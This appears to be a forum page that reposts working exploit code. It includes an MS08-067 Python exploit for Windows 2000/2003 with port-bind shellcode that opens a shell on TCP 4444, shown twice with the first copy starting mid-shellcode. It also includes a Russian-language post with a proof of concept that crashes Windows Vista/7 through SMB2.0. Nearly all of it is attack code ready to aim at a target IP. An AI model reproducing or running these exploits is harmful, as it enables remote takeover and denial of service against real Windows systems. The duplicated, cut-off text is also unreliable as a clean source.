shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
if sys.argv[2]=='1': #Windows 2000 Payload
payload=payload_1
print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2': #Windows 2003[SP2] Payload
payload=payload_2
print '[-]Windows 2003[SP2] payload loaded'
class SRVSVC_Exploit(Thread):
def __init__(self, target, osver, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.osver = osver
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub+=shellcode
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub+=payload
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'
if __name__ == '__main__':
try:
target = sys.argv[1]
osver = sys.argv[2]
except IndexError:
print '\nUsage: %s \n' % sys.argv[0]
print 'Example: srvsvcexpl.py 192.168.1.1 2\n'
print 'Select OS Version'
print '[-]Windows 2000: OS Version = 1'
print '[-]Windows 2003[SP2]: OS Version = 2'
sys.exit(-1)
current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'
# milw0rm.com [2008-11-16]
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#############################################################################
import struct
import sys
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket :
http://oss.coresecuri...cket.html'
print 'PyCrypto :
http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
if sys.argv[2]=='1': #Windows 2000 Payload
payload=payload_1
print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2': #Windows 2003[SP2] Payload
payload=payload_2
print '[-]Windows 2003[SP2] payload loaded'
class SRVSVC_Exploit(Thread):
def __init__(self, target, osver, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.osver = osver
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub+=shellcode
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub+=payload
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'
if __name__ == '__main__':
try:
target = sys.argv[1]
osver = sys.argv[2]
except IndexError:
print '\nUsage: %s
print 'Example: srvsvcexpl.py 192.168.1.1 2\n'
print 'Select OS Version'
print '[-]Windows 2000: OS Version = 1'
print '[-]Windows 2003[SP2]: OS Version = 2'
sys.exit(-1)
current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'
# milw0rm.com [2008-11-16]
Jon-dog
30.09.2009 - 6:52
(0day) Windows Vista/7 SMB2.0 Remote B.S.O.D PoC
Появился zero-day сплоит для Vista/Windows 7, позволяющий через SMB протокол отправить ось в синий экран (445 порт)
Появился zero-day сплоит для Vista/Windows 7, позволяющий через SMB протокол отправить ось в синий экран (445 порт)
» Нажмите, для открытия спойлера | Press to open the spoiler «
Code
#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
SoftoRooM © 2004-2024